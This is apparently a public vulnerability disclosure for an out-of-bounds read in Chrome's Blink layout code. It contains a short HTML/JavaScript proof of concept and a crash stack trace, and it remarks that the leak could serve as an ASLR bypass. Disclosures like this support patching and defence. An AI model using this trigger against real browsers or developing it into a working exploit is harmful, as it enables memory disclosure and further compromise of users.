
Google Chrome: out-of-bound read in layout

Let's get into it.

Steps to Reproduce:

Demo URL: http://hackies.in/testc.html
Bug: 695345

Code:
<style>
/* size/layout containment on the <content> wrapper around the <select> */
content { contain: size layout; }
</style>
<script>
function leak() {
 /* select everything, then shrink the option's text; the selection rect is
    then computed against a text box that no longer matches the shortened
    text (see localSelectionRect -> constructTextRun in the trace below) */
 document.execCommand("selectAll");
 opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>
</body>

Infoleak is demonstrated in the attached screenshot.

Since this is a layout bug, AFAIK the leaked data can't be obtained via DOM calls; however, it's possible to obtain it using tricks like the unicode-range CSS descriptor (credit to Jann Horn for coming up with that approach), which is likely sufficient to turn this into an ASLR bypass.

However, M56 crashes (signal 4, ILL_ILLOPN, in the trace below) before reaching the out-of-bound read.

Stack Trace for M56:

------
Chromium    56.0.2924.76 (Developer Build) Built on Ubuntu, running on Ubuntu 16.04 (64-bit)
Revision    314da7cc1e56fc9fa9271bac2b029922feb4b6f2
OS    Linux
JavaScript    V8 5.6.326.42
------

Received signal 4 ILL_ILLOPN 7fffd94af6ef
#0 0x7ffff78b602e base::debug::StackTrace::StackTrace()
#1 0x7ffff78b6423 <unknown>
#2 0x7ffff7bcb390 <unknown>
#3 0x7fffd94af6ef blink::InlineTextBox::constructTextRun()
#4 0x7fffd94afb00 blink::InlineTextBox::localSelectionRect()
#5 0x7fffd9456dd4 blink::LayoutText::localSelectionRect()
#6 0x7fffd9458fb5 blink::LayoutText::localVisualRect()
#7 0x7fffd94811b9 blink::PaintInvalidationState::computeVisualRectInBacking()
#8 0x7fffd9422444 blink::LayoutObject::invalidatePaintIfNeeded()
#9 0x7fffd941fd94 blink::LayoutObject::invalidateTreeIfNeeded()
#10 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#11 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#12 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#13 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#14 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#15 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#16 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#17 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#18 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#19 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#20 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#21 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#22 0x7fffd90d48b4 blink::FrameView::invalidateTreeIfNeeded()
#23 0x7fffd90d4b7b blink::FrameView::invalidateTreeIfNeededRecursiveInternal()
#24 0x7fffd90d4c8c blink::FrameView::invalidateTreeIfNeededRecursive()
#25 0x7fffd90d7acc blink::FrameView::updateLifecyclePhasesInternal()
#26 0x7fffd956d24d blink::PageAnimator::updateAllLifecyclePhases()
#27 0x7fffe624c997 blink::WebViewImpl::updateAllLifecyclePhases()
#28 0x7fffefcd746b cc::ProxyMain::BeginMainFrame()
#29 0x7fffefcdda7d <unknown>
#30 0x7ffff78b7563 base::debug::TaskAnnotator::RunTask()
#31 0x7fffe6756f7f blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue()
#32 0x7fffe6757ae0 blink::scheduler::TaskQueueManager::DoWork()
#33 0x7ffff78b7563 base::debug::TaskAnnotator::RunTask()
#34 0x7ffff78dd760 base::MessageLoop::RunTask()
#35 0x7ffff78df35d base::MessageLoop::DeferOrRunPendingTask()
#36 0x7ffff78e01bd base::MessageLoop::DoWork()
#37 0x7ffff78e05a9 base::MessagePumpDefault::Run()
#38 0x7ffff78dcb42 base::MessageLoop::RunHandler()
#39 0x7ffff79054d8 base::RunLoop::Run()
#40 0x7ffff2516649 <unknown>
#41 0x7ffff2608068 <unknown>
#42 0x7ffff2608464 <unknown>
#43 0x7ffff26078e1 content::ContentMain()
#44 0x555555a6589c <unknown>
#45 0x7fffe26ff830 __libc_start_main
#46 0x555555a65769 <unknown>
  r8: 0000000000000000  r9: 0000000000000000 r10: 00000000000002d6 r11: 0000000000000009
 r12: 0000000000000040 r13: 00007fffffffc0a0 r14: 0000000000000000 r15: 000025b111450000
  di: 0000000000000060  si: 000025b111450000  bp: 00007fffffffc0a0  bx: 000032d41e005f30
  dx: 000004d2e4ccc680  ax: 0000000000000001  cx: 0000000000000000  sp: 00007fffffffbfa0
  ip: 00007fffd94af6ef efl: 0000000000010283 cgf: 0000000000000033 erf: 0000000000000000
 trp: 0000000000000006 msk: 0000000000000000 cr2: 0000000000000000
[end of stack trace]
[Thread 0x7fffc8d87700 (LWP 4925) exited]

Bug reported by: Dhiraj Mishra
Upstream bug: Google Project Zero
